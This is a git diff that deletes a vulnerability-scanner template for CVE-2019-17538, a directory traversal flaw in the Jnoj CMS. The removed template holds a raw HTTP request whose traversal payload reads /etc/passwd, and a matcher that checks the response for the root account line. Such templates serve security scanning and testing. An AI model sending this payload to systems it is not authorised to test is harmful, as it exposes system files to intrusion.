Delete CVE-2019-17538.yaml
parent
780c343a95
commit
0a768b9d95
|
@ -1,21 +0,0 @@
|
||||||
id: CVE-2019-17538
|
|
||||||
info:
|
|
||||||
name: Jnoj Directory Traversal for file reading(LFI)
|
|
||||||
author: pussycat0x
|
|
||||||
severity: High
|
|
||||||
reference: https://github.com/shi-yang/jnoj/issues/53
|
|
||||||
tegs: cve.cve2019,jnoj,cms
|
|
||||||
requests:
|
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
matchers-conditions: and
|
|
||||||
matchers:
|
|
||||||
- type : regex
|
|
||||||
regex:
|
|
||||||
- "root:[x*]:0:0"
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
Loading…
Reference in New Issue